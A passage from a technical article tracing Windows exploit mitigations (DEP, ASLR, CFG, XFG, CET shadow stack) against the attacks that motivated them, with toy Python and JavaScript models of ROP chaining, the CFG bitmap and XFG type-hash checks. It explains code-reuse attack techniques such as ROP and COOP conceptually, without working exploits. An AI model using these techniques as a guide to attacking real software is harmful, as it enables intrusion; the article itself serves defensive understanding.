The fastest way to see this is to compare two PowerShell sessions. Pick a maximally-hardened process, the Edge content process, and run Get-ProcessMitigation -Name msedge.exe. Six mitigations show as ON: CFG, CET shadow stack, ACG, CIG, Disable-Win32k, and Disable-Extension-Points. Now do the same for Notepad.exe. One or two show as ON. Notepad is a different kind of process -- it is not parsing attacker-controlled bytes from the public internet, so the mitigation surface it carries is correspondingly small.

The mitigation set is not just an enable-everything list. Several of the policies are mutually expensive (CET costs cycles on every call/ret; ACG forbids any in-process JIT; CIG forbids any third-party plugin); turning them all on is only viable for a process whose owner accepts those costs. The PowerShell Set-ProcessMitigation and Get-ProcessMitigation cmdlets ship in the ProcessMitigations module that succeeded EMET in 2018.

Edge carries six mitigations because it has six structurally separate ways the attacker can win. CFG addresses the indirect-call hijack. CET addresses the return-address hijack. ACG addresses the "redirect the JIT to emit my shellcode" hijack. CIG addresses the "plant a Microsoft-signed DLL where the loader picks it up" hijack. Disable-Win32k addresses the renderer-to-kernel escape. Disable-Extension-Points addresses the AppInit_DLLs-class injection.

Each one is the closing footnote on a different generation of offensive research. CFG closes indirect-call hijacking. CET closes the shadow-stack-less era. ACG closes JIT spray. CIG closes signed-DLL planting. Get-ProcessMitigation lays them out as a flat list of ON checkmarks, as if they had always been there -- as if they had not each cost a decade of research to design and ship.

So the chain failed. But which mitigation caught the indirect-call hijack we started with -- and why was that one on? Where do these mitigations come from, and how did Windows arrive at this exact set? To answer that, we have to go back three decades.

2. How attackers stopped being able to put bytes on the stack and run them

The story starts in November 1996. Phrack magazine, issue forty-nine, file fourteen of sixteen. Aleph One -- the handle of Elias Levy, a security columnist who would later moderate the BugTraq mailing list -- publishes Smashing The Stack For Fun And Profit [@phrack-49-14]. The article is a recipe. It walks the reader through process memory layout on Unix, the structure of the call stack on x86, the mechanics of overwriting the saved return address, the construction of /bin/sh shellcode, and the use of NOP sleds. By the end the reader has working exploit code against syslog, splitvt, sendmail 8.7.5, and Linux/FreeBSD mount.

Buffer overflows existed before Aleph One. The 1988 Morris Worm used one in fingerd; Mudge's 1995 How to Write Buffer Overflows L0pht paper had pieces of the technique. But it was an oral tradition -- something you learned at DEFCON or from someone who learned it at DEFCON. Aleph One's contribution was pedagogical: a step-by-step recipe anyone with a debugger and an afternoon could follow. Once that recipe was published, every memory-safety bug in C and C++ -- and there were many -- became a candidate for shell-as-the-vendor.

The defensive response came fast, and it came with a brutal honesty that has shaped every later mitigation. In August 1997, Alexander Peslyak, writing under the handle Solar Designer and running the Openwall Project, posted to BugTraq [@solar-designer-bugtraq-1997]. He had two things. The first was a Linux kernel patch -- still documented at the Openwall README to this day -- that made user-mode stack pages non-executable in software, since AMD's hardware NX bit was six years away [@openwall-readme]. The second was a working return-into-libc exploit against lpr, which redirected execution into system() in the C library rather than into stack-resident shellcode. Solar Designer was honest enough to publish the bypass on the same day as the patch. This is a defender-publishes-own-bypass precedent that has governed almost every Microsoft mitigation announcement since: ship the mitigation, name the residual attack class, set the expectation that the mitigation is a speed bump rather than a fix.

A memory protection invariant -- "write XOR execute" -- requiring that any page in the process address space be either writable or executable, but never both at the same time. PaX shipped the first complete implementation of W^X on Linux in 2000; AMD's NX bit in 2003 moved it from software emulation to hardware enforcement; the per-process ACG policy in Windows generalises W^X to apply for the lifetime of an entire process, with no per-thread escape hatch.

The next move was structural. In September 2000 the pseudonymous PaX Team released PAGEEXEC, the Linux non-executable-page implementation that made every writable page non-executable (not just the stack), using clever x86 segment-limit and split-TLB tricks [@wiki-pax]. PaX is also where the term "ASLR" comes from. The July 2001 PaX patch series randomized the executable base, the stack, the heap, the mmap'd library region, and (with RANDEXEC) even the position of the executable's code segment. The PaX design document for ASLR is unusually rigorous about probability -- it derives the expected number of brute-force attempts as a function of entropy bits, decades before anyone framed it that way in the academic literature.

Address Space Layout Randomization. Per-boot or per-load randomization of the locations at which the kernel maps modules, the stack, the heap, and `mmap`'d regions into a process's virtual address space. On x86-32 Windows Vista, modules had one of 256 possible base addresses (about 8 bits of entropy). On x64 with `/HIGHENTROPYVA`, entropy is much higher because the virtual address space is larger. ASLR is the precondition that makes every later forward-edge CFI scheme worth deploying -- without it, the attacker just hardcodes the call target.
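The relationship between the number of possible base addresses, entropy bits, and brute-force cost is simple arithmetic. The sketch below uses textbook probability under two stated assumptions (uniformly random placement, and either a layout that re-randomizes after every failed guess or one that stays fixed so candidates can be eliminated); it is not the derivation from the PaX design document, and the function names are illustrative.

```python
import math


def entropy_bits(positions: int) -> float:
    """Bits of entropy for a uniformly random choice among `positions`."""
    return math.log2(positions)


def expected_guesses_rerandomized(positions: int) -> float:
    """Layout is re-randomized after each failed guess, so every guess
    succeeds with probability 1/positions (geometric distribution)."""
    return float(positions)


def expected_guesses_fixed_layout(positions: int) -> float:
    """Layout stays fixed across guesses, so the attacker can cross off
    wrong candidates: the mean of a uniform draw from 1..positions."""
    return (positions + 1) / 2


# The Vista x86 figure quoted above: 256 possible module bases.
vista_x86 = 256
summary = (
    entropy_bits(vista_x86),
    expected_guesses_rerandomized(vista_x86),
    expected_guesses_fixed_layout(vista_x86),
)
```

For 256 positions this gives 8 bits, 256 expected guesses when every failure triggers re-randomization, and 128.5 when the layout persists between attempts. Either figure is small enough to show why a crash-tolerant target with 8 bits of entropy is brute-forceable, and why the larger x64 address space matters.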

Hardware finally caught up on September 23, 2003. AMD shipped the no-execute bit -- "NX bit," bit 63 of the 64-bit long-mode page-table entry -- with the Athlon 64 launch [@wiki-nx-bit]. Intel followed with the marketing-renamed "XD bit" in later Pentium 4 Prescott silicon. From 2003 onward, marking a page non-executable was a single PTE flag away.

Microsoft consumed the hardware almost immediately. Windows XP Service Pack 2, RTM August 6, 2004, shipped Data Execution Prevention as a system-wide feature. DEP defaulted to OptIn but supported four system-level modes (OptIn, OptOut, AlwaysOn, AlwaysOff) and exposed a per-binary opt-in via the /NXCOMPAT PE-header flag. On hardware without NX, DEP fell back to a software emulation limited to system-supplied binaries.

The Wikipedia ROP article frames this moment exactly: "Microsoft Windows provided no buffer-overrun protections until 2004" [@wiki-rop]. After XP SP2, Windows joined PaX, OpenBSD, and Solar Designer's Openwall on the W^X side of the line.

Three years later, in January 2007, Microsoft shipped Vista. Vista randomized DLL and EXE module bases at boot, with 256 possible load locations per module on x86. Michael Howard's MSDN design blog from May 2006 gives a worked example showing wsock32.dll at 0x73ad0000 on one boot and 0x73200000 on the next [@ms-howard-vista-aslr]. Vista paired ASLR with /GS stack canaries, /SafeSEH validated SEH chains, DEP, and pointer obfuscation -- the first Microsoft OS to ship a layered exploit-mitigation stack as policy.

Figure (timeline): 1996 Nov, Aleph One, Phrack 49 file 14 -> 1997 Aug, Solar Designer, non-exec stack + return-into-libc -> 2000 Sep, PaX Team, PAGEEXEC -> 2001 Jul, PaX, first ASLR -> 2003 Sep, AMD NX bit, Athlon 64 -> 2004 Aug, Microsoft DEP, Windows XP SP2 -> 2006 May, Microsoft, Vista ASLR design -> 2007 Jan, Vista GA, layered mitigation.

DEP and ASLR are not per-process mitigations in the modern sense. They are the system-wide foundation that the per-process surface sits on top of. The reason ProcessDEPPolicy still exists in the modern enum at all is to give 32-bit processes a way to enforce DEP locally even when the system policy is permissive. On x64, DEP is unconditionally on; the per-process knob is a vestigial 32-bit-only flag. ProcessASLRPolicy is more useful -- it allows a process to force-on high-entropy bottom-up randomization with ForceRelocateImages -- but it too is a refinement of a system-wide foundation, not a new defensive primitive [@ms-setprocessmitigationpolicy].

By 2007, the story should have been over. DEP had made shellcode unrunnable. ASLR had made gadget addresses unpredictable. Every attacker primitive Aleph One named in 1996 was, in principle, defended. It was not.

Because the attacker did not need to write new bytes. They could reuse the bytes that were already there.

3. ASLR plus DEP made shellcode hard, so attackers stopped writing shellcode

October 2007. Hovav Shacham, then on the UC San Diego computer-science faculty after a postdoctoral fellowship at the Weizmann Institute, presents The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86) at ACM CCS [@shacham-rop-pdf]. The paper's existence claim is simple and devastating: in any sufficiently large C library, the set of short instruction sequences ending in ret is Turing-complete. The attacker does not need to inject any new code. They only need to write data -- a sequence of return addresses on the stack -- and the CPU obediently executes already-mapped, already-executable libc bytes in the attacker's chosen order.

The mechanism is small enough to explain in a paragraph. Shacham named the technique return-oriented programming. The attacker arranges for the program to return into a gadget -- a short sequence of one to four instructions ending in ret. The gadget is selected from existing executable memory: libc, ntdll, the program's own code segment. The instructions perform a useful primitive (load a register, do arithmetic, dereference a pointer). The trailing ret pops the next stack slot, which the attacker has populated with the address of the next gadget. The stack is now the program counter; the CPU is now a Turing-complete machine for whatever language the gadget catalog implements.
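A toy machine makes the "stack is now the program counter" point concrete. In the sketch below the gadget table stands in for already-mapped executable memory that the attacker cannot modify; the addresses, register names, and gadget set are all invented for illustration, and nothing here models real x86 semantics.

```python
# Each gadget performs one small primitive and then implicitly "returns".
def pop_a(m):   m["a"] = m["stack"].pop()   # pop a ; ret
def pop_b(m):   m["b"] = m["stack"].pop()   # pop b ; ret
def add_ab(m):  m["a"] += m["b"]            # add a, b ; ret
def store_a(m): m["out"].append(m["a"])     # store a ; ret

# Fixed "executable memory": hypothetical addresses mapped to existing code.
GADGETS = {0x1000: pop_a, 0x1010: pop_b, 0x1020: add_ab, 0x1030: store_a}


def run(stack_image):
    """Execute a chain. The attacker controls only `stack_image` (data)."""
    m = {"a": 0, "b": 0, "out": [], "stack": list(reversed(stack_image))}
    while m["stack"]:
        address = m["stack"].pop()      # ret: next stack slot becomes the PC
        gadget = GADGETS.get(address)
        if gadget is None:
            break                       # returned to unmapped memory: crash
        gadget(m)
    return m["out"]


# Attacker-supplied data only: gadget addresses interleaved with operands.
chain = [0x1000, 40, 0x1010, 2, 0x1020, 0x1030]
result = run(chain)   # computes 40 + 2 without injecting any new code
```

Every behaviour in `result` comes from code that was already present in `GADGETS`; the attacker wrote only integers. That is the property that lets the technique pass a W^X check.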

An exploitation technique in which the attacker chains short, existing instruction sequences ("gadgets") each ending in `ret`. Control transfers happen via the program's own return instructions, executing already-mapped, already-executable code. ROP defeats W^X (DEP, NX) because the attacker injects no new code. ASLR weakens ROP but does not break it, because info-leak primitives recover the gadget base address. Coined by Hovav Shacham in 2007 [@shacham-rop-pdf].

The follow-up Black Hat USA 2008 talk generalised the result to RISC architectures [@shacham-bhusa-2008], killing "x86's variable-length instructions are why ROP works" as a defensive direction. ROP works on ARM. ROP works on MIPS. ROP works wherever an attacker can predict the address of executable bytes and control the stack.

Return-oriented programming allows an attacker to execute code in the presence of security defenses such as executable space protection. -- Wikipedia, *Return-oriented programming*, lead paragraph [@wiki-rop]

After 2007, the structural agenda of every defensive engineering team on Windows changes. The question is no longer "can we stop the attacker from writing bytes into executable pages?" -- DEP solved that, and ROP routed around it. The question is now: "which control transfers is the attacker allowed to cause?"

Shacham's UCSD lab (later UT Austin) kept exploring the boundary between code-reuse attacks and provable software defenses. The 2007 paper is the field-shaping one; the 2008 BHUSA generalisation to RISC was the closing argument.

Key idea: After Shacham 2007, every defensive engineering decision in Windows mitigation has been about which control-flow transfers the attacker is allowed to cause, not about what bytes the attacker can write. This is the article's load-bearing axis. CFG, XFG, CET, ACG, CIG, and every smaller mitigation in PROCESS_MITIGATION_POLICY follow from this one shift.

Microsoft's first response was behavioral, not structural. In 2009 the company released the Enhanced Mitigation Experience Toolkit (EMET), a free shim DLL that injected runtime checks into existing user-mode processes to detect ROP-shaped behavior. EMET checked for stack pivots, for unaligned ret-targets, for known-malicious gadget sequences, for unusual SEH chain layouts. It worked, intermittently, for a while. Then attackers adjusted, gadget-replacing around EMET's heuristics, and Microsoft slowly conceded the behavioral-detection direction was a dead end. EMET's final release was 5.52 in November 2016; end of life was July 31, 2018 [@wiki-emet]. Microsoft's stated successors are the ProcessMitigations PowerShell module and Windows Defender Exploit Guard -- i.e., the formal SetProcessMitigationPolicy surface this article catalogs [@wiki-emet].

EMET was an honorable failure. It taught the security industry that you cannot detect a control-flow hijack by looking at its symptoms; you can only prevent it by enforcing an invariant on the control flow itself. That lesson is exactly what Control Flow Guard (CFG) and Control-Flow Enforcement Technology (CET) embody. Every behavioral-ROP-detection product since EMET (Carbon Black's BB exploit protection, Symantec's Heat Shield, vendor-specific EDR ROP checks) has had the same fate against motivated adversaries -- you can buy time but you cannot fix the problem in heuristics.

The structural answer arrived two years before the offensive proof that motivated it. In November 2005, at ACM CCS, Martín Abadi, Mihai Budiu, Úlfar Erlingsson, and Jay Ligatti published Control-Flow Integrity (also released as Microsoft Research Technical Report MSR-TR-2005-18) [@msr-cfi]. Their formal definition is short: the execution of a program dynamically follows only paths defined by a static control-flow graph. They proved CFI is enforceable using compile-time-inserted runtime checks and demonstrated a software rewriting implementation.

Control-Flow Integrity (CFI): A defensive property formalized by Abadi, Budiu, Erlingsson, and Ligatti in 2005 [@msr-cfi]: the execution of a program must dynamically follow only paths defined by the program's static control-flow graph (not to be confused with Control Flow Guard, which shares the abbreviation CFG). CFI partitions into a forward-edge property (the targets of indirect calls and jumps must be valid) and a backward-edge property (each return must go back to the call site that made the call). CFG, XFG, and kCFG are forward-edge CFI implementations. CET's shadow stack is a backward-edge CFI implementation. Apple's PAC, which signs both indirect-branch targets and return addresses, spans both edges.

CFI was a research framework looking for a vendor. It would wait nine years. The reader's belief at this point might be "DEP plus ASLR is enough." The honest belief, after Shacham, is that DEP plus ASLR raises the cost but does not change the game. The attacker still wins if they can choose where the next ret lands. The structural answer -- constraining the control transfer rather than the write -- is what makes Control Flow Guard make sense.

What does constraining the control transfer look like in machine code?

4. Control Flow Guard (CFG): compile-time, load-time, runtime

Where DEP was enforced by hardware on every page, CFG is enforced by software on every indirect call. The compiler is now a security tool.

CFG's ship history is more complicated than the marketing remembers. The canonical primary on the early dates is Yunhai Zhang's Black Hat USA 2015 deck, Bypass Control Flow Guard Comprehensively, which states verbatim: "It was first introduced in Windows 8.1 Preview, but disabled in Windows 8.1 RTM for compatibility reason. Then, it was improved and enabled in Windows 10 Technical Preview and Windows 8.1 Update" [@zhang-bhusa15]. Visual Studio 2015 added the compiler and linker flags. By the time Windows 10 shipped to consumers in July 2015, CFG was a documented Win32 security feature [@ms-cfg-doc].

Accounts of the ship date vary between "Windows 8.1 Update 3, November 2014" and "Windows 10, July 2015". Zhang's deck is the contemporaneous primary that resolves the dispute: CFG was in Windows 8.1 Preview, was disabled in Windows 8.1 RTM for compatibility, returned in Windows 8.1 Update and Windows 10 Technical Preview, and shipped widely with Windows 10 in 2015.

The mechanism has four phases. Each phase is a separate engineering subsystem, owned by a different team.

Phase 1: Compile-time (/guard:cf). The MSVC compiler emits, before every indirect call instruction, a call to one of two compiler-supplied thunks: __guard_check_icall_fptr for the standard pattern, or __guard_dispatch_icall_fptr for the tail-call optimization where the validator itself jumps to the target [@ms-guard-cf-compiler]. The thunk is a single indirection through ntdll. At compile time it is a stub; at load time it is patched to point at the active validator.

Phase 2: Link-time (/GUARD:CF, which requires /DYNAMICBASE). The linker writes the Guard CF Function Table (FID table) into the PE image's IMAGE_LOAD_CONFIG_DIRECTORY [@ms-guard-cf-linker]. This table is the static catalog of every CFG-valid call target in this binary: every function whose address is taken, plus every function exported. dumpbin /headers /loadconfig <binary> prints the table contents -- you can read the actual Guard CF flag word and the FID table present line.

Note: The MSVC linker only emits the FID table when /DYNAMICBASE is also set [@ms-guard-cf-compiler, @ms-guard-cf-linker]. A binary compiled with /guard:cf but linked without /DYNAMICBASE will pass code review, ship, and provide zero protection at runtime. This is the single most common CFG misconfiguration in third-party software. Always confirm with dumpbin /headers /loadconfig that the Guard Flags word is non-zero and that FID Table present is in the output.

Phase 3: Load-time. At process startup and on every subsequent LoadLibrary, ntdll!LdrpProtectAndRelocateImage unions the FID table of the loaded image into a per-process bitmap. The bitmap is a sparse data structure with one bit per 8 bytes of virtual address space, so it is 1/64th the size of the range it describes. On 32-bit Windows, a 2 GB user address space needs about 32 megabytes of valid-target bits. On x64 the same ratio applied to a 128 TB user address space gives a reservation on the order of 2 terabytes, but the memory only commits on access, so the resident set stays small.

CFG bitmap: A sparse, per-process bit vector indexed by virtual address (one bit per 8 bytes). A set bit at index `addr / 8` means that `addr` is a CFG-valid indirect-call target in some loaded image. The kernel commits the bitmap pages on first access and shares them copy-on-write across processes with identical module-load layouts. The bitmap is the runtime data structure that `LdrpValidateUserCallTarget` consults on every indirect call.
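The size of the bitmap follows directly from the one-bit-per-8-bytes ratio, and the arithmetic is worth doing once. The sketch below is only that arithmetic. The two address-space sizes (2 GiB of user space on 32-bit, 128 TiB on x64) are assumptions supplied for the example, and `cfgBitmapBytes` is a hypothetical helper, not a Windows API.

```javascript
// One bitmap bit covers 8 bytes of address space, and one bitmap byte holds
// 8 bits, so the bitmap is 1/64th the size of the range it describes.
function cfgBitmapBytes(addressSpaceBytes) {
  const bits = addressSpaceBytes / 8n;   // one bit per 8 bytes
  return bits / 8n;                      // 8 bits per bitmap byte
}

const MiB = 1n << 20n;
const GiB = 1n << 30n;
const TiB = 1n << 40n;

// Assumed user-mode address-space sizes (supplied for this example).
const user32 = 2n * GiB;     // default 32-bit user address space
const user64 = 128n * TiB;   // x64 user address space

console.log(cfgBitmapBytes(user32) / MiB + ' MiB');   // 32 MiB
console.log(cfgBitmapBytes(user64) / TiB + ' TiB');   // 2 TiB
```

The x64 figure is a reservation, not a commitment: only the bitmap pages that describe actually-loaded images are ever backed by physical memory.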

Phase 4: Runtime. Every indirect call goes through ntdll!LdrpValidateUserCallTarget. The validator takes the call target in rcx (x64 calling convention), divides by 8, indexes into the bitmap, and tests the bit. If set, return; the call proceeds. If clear, fall through to __fastfail(FAST_FAIL_GUARD_ICALL_CHECK_FAILURE), which raises STATUS_STACK_BUFFER_OVERRUN. The process dies.

sequenceDiagram
    participant Src as C++ source
    participant CC as "MSVC /guard:cf"
    participant Ln as "Linker /GUARD:CF /DYNAMICBASE"
    participant Ldr as ntdll loader
    participant Rt as Runtime
    Src->>CC: address-taken funcs plus indirect call sites
    CC->>Ln: object file plus FID hints
    Ln->>Ldr: PE with FID table in load-config dir
    Ldr->>Ldr: union FID table into bitmap
    Note over Ldr: one bit per 8 bytes
    Rt->>Ldr: indirect call via LdrpValidateUserCallTarget
    alt bit set
        Ldr->>Rt: proceed
    else bit clear
        Ldr->>Rt: fastfail STATUS_STACK_BUFFER_OVERRUN
    end
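The load-time and runtime phases can be sketched as a toy model. This is an illustration of the data structure, not the ntdll implementation: `CfgBitmap`, its method names, the load address, and the RVAs are all hypothetical, and a `Set` of bit indexes stands in for the sparse bitmap.

```javascript
// Toy model of the CFG bitmap: one bit per 8 bytes of address space.
// A Set of bit indexes stands in for the sparse, kernel-backed bitmap.
class CfgBitmap {
  constructor() { this.bits = new Set(); }

  // Load time: merge an image's function table (RVAs) at its load address.
  addImage(imageBase, functionRvas) {
    for (const rva of functionRvas) this.bits.add((imageBase + rva) / 8n);
  }

  // Runtime: the check an instrumented indirect call performs first.
  validate(target) {
    if (!this.bits.has(target / 8n)) {
      throw new Error('fastfail: invalid indirect-call target 0x' + target.toString(16));
    }
    return target;
  }
}

const bitmap = new CfgBitmap();
const base = 0x7ff600000000n;                // hypothetical load address
bitmap.addImage(base, [0x1000n, 0x1040n]);   // hypothetical address-taken functions

bitmap.validate(base + 0x1000n);             // function entry: allowed
try {
  bitmap.validate(base + 0x1010n);           // mid-function gadget: rejected
} catch (e) {
  console.log(e.message);
}
```

In this simplified one-bit model, every address inside the same 8-byte slot shares a bit. The point of the sketch is the shape of the check: a divide, an index, and a bit test on every indirect call.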

There is an exception: code that is generated at runtime, like a JavaScript JIT, cannot have its targets pre-baked into a static FID table. For this case, CFG exposes SetProcessValidCallTargets, which lets a process programmatically mark an in-process address range as a permitted call target [@ms-cfg-doc]. The companion PAGE_TARGETS_INVALID and PAGE_TARGETS_NO_UPDATE page-protection flags let the process control which newly-allocated pages start with a clear bitmap. The reason this API exists at all is the structural collision between a statically built valid-target table and runtime code generation -- a collision that section 8 (ACG) will eventually resolve by moving the JIT out of process.

You can read the load-config flag word directly. The hex value is a bit field of IMAGE_GUARD_* constants. The most common bits are IMAGE_GUARD_CF_INSTRUMENTED (the binary has CFG indirect-call checks), IMAGE_GUARD_CFW_INSTRUMENTED (the binary has CFG indirect-call checks plus write-protection checks), IMAGE_GUARD_CF_FUNCTION_TABLE_PRESENT (the FID table is in the PE), IMAGE_GUARD_CF_LONGJUMP_TABLE_PRESENT, and IMAGE_GUARD_RETPOLINE_PRESENT. The decoder is short enough to inline:

{`
// Guard Flags bit definitions (IMAGE_GUARD_* constants).
const FLAGS = [
  [0x00000100, 'IMAGE_GUARD_CF_INSTRUMENTED'],
  [0x00000200, 'IMAGE_GUARD_CFW_INSTRUMENTED'],
  [0x00000400, 'IMAGE_GUARD_CF_FUNCTION_TABLE_PRESENT'],
  [0x00000800, 'IMAGE_GUARD_SECURITY_COOKIE_UNUSED'],
  [0x00001000, 'IMAGE_GUARD_PROTECT_DELAYLOAD_IAT'],
  [0x00002000, 'IMAGE_GUARD_DELAYLOAD_IAT_IN_ITS_OWN_SECTION'],
  [0x00004000, 'IMAGE_GUARD_CF_EXPORT_SUPPRESSION_INFO_PRESENT'],
  [0x00008000, 'IMAGE_GUARD_CF_ENABLE_EXPORT_SUPPRESSION'],
  [0x00010000, 'IMAGE_GUARD_CF_LONGJUMP_TABLE_PRESENT'],
  [0x00020000, 'IMAGE_GUARD_RF_INSTRUMENTED'],
  [0x00040000, 'IMAGE_GUARD_RF_ENABLE'],
  [0x00080000, 'IMAGE_GUARD_RF_STRICT'],
  [0x00100000, 'IMAGE_GUARD_RETPOLINE_PRESENT'],
];

// Real-world example value from a fully-instrumented MSVC 2022 binary
const guardFlags = 0x0001050C;
console.log('Guard Flags = 0x' + guardFlags.toString(16).padStart(8, '0'));

let known = 0;
for (const [bit, name] of FLAGS) {
  known |= bit;
  if (guardFlags & bit) console.log(' set: ' + name);
}

// Report bits this table does not name instead of dropping them silently.
const undecoded = (guardFlags & ~known) >>> 0;
if (undecoded) console.log(' not decoded: 0x' + undecoded.toString(16));
`}

CFG is forward-edge only. The ret instruction is invisible to it. A ROP chain that uses only return-target gadgets -- the original Shacham construction -- is not affected by CFG at all, because CFG never asks "where did this ret go?" It only asks "where did this indirect call go?" Closing the backward edge is a separate problem (section 6).

CFG is also coarse-grained. The bitmap records "is this address a valid function entry?" but not "is this address a valid function entry for this particular call site's prototype?" Any function entry in the entire process is a valid CFG target for every indirect call site. If the attacker finds a legitimate function that takes a controllable argument and does something useful, they can chain it into a working exploit without ever flipping a clear bit to set.

Those two limitations -- forward-edge only, coarse-grained -- are precisely the open questions section 5 (XFG, fine-graining) and section 6 (CET shadow stack, backward edge) answer. CFG was the first floor. The next two sections build out the rest.

5. eXtended Flow Guard (XFG): type-hash, fine-grained CFI for indirect calls

CFG asks "is this a function entry?" XFG asks the better question: "is this the right kind of function entry?"

The structural reason XFG exists has a name and a paper. May 2015, IEEE Symposium on Security and Privacy. Felix Schuster, Thomas Tendyck, Christopher Liebchen, Lucas Davi, Ahmad-Reza Sadeghi, and Thorsten Holz publish Counterfeit Object-oriented Programming: On the Difficulty of Preventing Code Reuse Attacks in C++ Applications [@coop-ieeesecurity-pdf]. The paper's abstract is constructive and brutal: COOP is "the first code-reuse attack to enable the synthesis of malicious behavior on x86 and ARM platforms" that "fully complies with previously presented coarse-grained CFI defenses."

We propose a new attack technique, called Counterfeit Object-Oriented Programming (COOP), which is the first code-reuse attack to enable the synthesis of malicious behavior on x86 and ARM platforms and which fully complies with previously presented coarse-grained CFI defenses. -- Schuster et al., IEEE S&P 2015 [@coop-ieeesecurity-pdf]

Counterfeit Object-Oriented Programming (COOP): A code-reuse attack technique that chains legitimate C++ virtual function calls in attacker-chosen order, achieved by corrupting vtable pointers or vtable contents. Each individual callee is a real, address-taken function entry that passes any coarse-grained CFI bitmap. The attacker assembles Turing-complete computation by chaining these legitimate calls. Published by Schuster, Tendyck, Liebchen, Davi, Sadeghi, and Holz at IEEE S&P 2015 [@coop-ieeesecurity-pdf].

The mechanism is simple to describe but hard to detect. The attacker corrupts a heap-resident C++ object's vtable pointer to point at a fake vtable they have crafted from gadget-like virtual functions of real classes in the binary. Each entry in the fake vtable points at the entry of a real virtual method. The program's own virtual dispatch sequence performs the calls. The control transfers all land at legitimate function entries. CFG, which only asks "is this a function entry?", sees nothing wrong.

Microsoft's first public disclosure of the answer came at BlueHat Shanghai in 2019. David Weston -- listed on the title slide of the deck as "Microsoft OS Security Group Manager" -- presented the design of eXtended Flow Guard (XFG) [@weston-bhshanghai-2019]. Microsoft never published a written XFG specification; the canonical public deconstruction is Connor McGarr's August 2020 reverse-engineering, which remains the best public account of how the mechanism actually works [@mcgarr-xfg].

The mechanism is elegant. At compile time, MSVC computes a 64-bit type hash for every function: a truncated SHA-256 (first 8 bytes of the 32-byte digest) of the parameter count, parameter types, variadic flag, calling convention, and return type. The compiler stores this hash 8 bytes before each CFG-valid function entry [@mcgarr-xfg]. At each indirect call site, the compiler knows the expected prototype (from the call's static type), emits the same hash inline, and the dispatch thunk reads the 8 bytes preceding the target and compares.

flowchart TD
    A[Indirect call site] --> B{"CFG bitmap<br/>bit set?"}
    B -->|No| F1[__fastfail]
    B -->|Yes| C{"XFG enabled?"}
    C -->|No| D[Proceed<br/>CFG only]
    C -->|Yes| E[Read hash<br/>at target - 8]
    E --> G{"Hash matches<br/>expected prototype?"}
    G -->|No| F2[__fastfail<br/>same status]
    G -->|Yes| H[Proceed<br/>full XFG]

A COOP attacker who replaces a vtable pointer with the address of a different real virtual function passes CFG: the new target is a valid function entry. They fail XFG: the 8 bytes preceding the new target encode a different prototype hash than the call site expects. The fix moves the granularity from "every function entry" to "every function entry compatible with this exact prototype" -- orders of magnitude closer to perfect forward-edge CFI.
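The prototype check can be sketched in a few lines. Two things here are assumptions and should be read as such. First, the sketch swaps in FNV-1a as a dependency-free stand-in for the truncated SHA-256 described above. Second, the way `typeHash` serializes a prototype is invented for the example, because the exact input MSVC hashes is not publicly specified. The function and prototype names are hypothetical.

```javascript
// Stand-in 64-bit hash (FNV-1a). The mechanism described above uses a
// truncated SHA-256; FNV-1a is used here only to avoid a crypto dependency.
function hash64(text) {
  let h = 0xcbf29ce484222325n;
  for (let i = 0; i < text.length; i++) {
    h ^= BigInt(text.charCodeAt(i));
    h = (h * 0x100000001b3n) & 0xffffffffffffffffn;
  }
  return h;
}

// Hypothetical serialization of a prototype (not MSVC's real input format).
function typeHash(proto) {
  return hash64(
    [proto.ret, proto.callConv, proto.variadic, proto.params.length, ...proto.params].join('|')
  );
}

// "Compile time": each function carries its hash just before its entry point.
function defineFunction(name, proto) {
  return { name, hashBeforeEntry: typeHash(proto) };
}

// "Call site": the expected hash comes from the call's static type.
function xfgDispatch(target, callSiteProto) {
  if (target.hashBeforeEntry !== typeHash(callSiteProto)) {
    throw new Error('fastfail: prototype mismatch calling ' + target.name);
  }
  return 'called ' + target.name;
}

const draw = { ret: 'void', callConv: 'cdecl', variadic: false, params: ['Shape*'] };
const exec = { ret: 'int', callConv: 'cdecl', variadic: false, params: ['const char*'] };

const circleDraw = defineFunction('Circle::draw', draw);
const runCommand = defineFunction('run_command', exec);

console.log(xfgDispatch(circleDraw, draw));   // called Circle::draw
try {
  xfgDispatch(runCommand, draw);              // real function entry, wrong prototype
} catch (e) {
  console.log(e.message);
}
```

Under plain CFG both targets would pass, because both are real function entries. The hash comparison is what separates them.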

XFG shipped in Windows 10 21H1 internals. The /guard:xfg MSVC flag was added. The XFG dispatch thunks (__guard_xfg_dispatch_icall_fptr) appeared in ntdll.dll. Enforcement was never turned on by default.

Connor McGarr's Black Hat USA 2025 deck, Out of Control: How KCFG and KCET Redefine Control Flow Integrity in the Windows Kernel, states verbatim: "XFG was never fully instrumented (UM/KM) and is now deprecated." McGarr is listed on the title slide as Software Engineer, Prelude Security [@mcgarr-bhusa25].

Two reasons XFG didn't ship enforcement-by-default. First, compatibility cost: XFG breaks any call made through a function pointer cast to a different prototype. Windows is full of these, including in third-party drivers and inbox COM components, and every breakage costs a customer ticket. Second, hardware overtook software. CET shadow stack arrived on Tiger Lake in September 2020 (section 6) and protected the entire backward edge in hardware. That left the forward edge coarse-grained, but it made a complete CFI surface achievable by composing CFG (forward, coarse) with CET (backward, exact). The math worked out: ship CET strictly, and a coarse-grained forward edge is good enough, because the backward edge that ret-based ROP depends on is now exact.

XFG remains the most interesting almost-shipped Windows mitigation. The instrumentation is in MSVC. The dispatch thunks are in ntdll. Enforcement-by-default never arrived, and the McGarr 2025 deck names it as deprecated. Microsoft made the strategic pivot to hardware instead.

What does that hardware look like, and what edge does it protect? Tiger Lake shipped in September 2020. For the first time since Shacham 2007, the kind of ROP that chains ret-terminated gadgets could be killed by the CPU itself.

6. Hardware-enforced Stack Protection (Intel CET shadow stack)

The Microsoft Tech Community post that introduced CET shadow stack on Windows -- preserved on the Wayback Machine because the live URL is a JavaScript-rendered shell -- gives the framing in one sentence:

We shipped Control Flow Guard (CFG) in Windows 10 to enforce integrity on indirect calls (forward-edge CFI). Hardware-enforced Stack Protection will enforce integrity on return addresses on the stack (backward-edge CFI), via Shadow Stacks. -- Microsoft Tech Community, *Understanding Hardware-enforced Stack Protection* [@cet-techcommunity-wayback]

Shadow stack: A second, per-thread stack maintained by the CPU in parallel with the regular call stack. Every `call` instruction pushes the return address to both stacks. Every `ret` pops both and compares. A mismatch raises a `#CP` (Control Protection) fault, which Windows surfaces as `STATUS_STACK_BUFFER_OVERRUN`. The shadow stack page is hardware-protected: ordinary user-mode stores into it fault, and only control-transfer microcode (such as `call`) and the dedicated shadow-stack write instructions (`WRSS`, `WRUSS`) can write to it. `INCSSP` and `RDSSP` adjust and read the shadow-stack pointer rather than the stack contents.

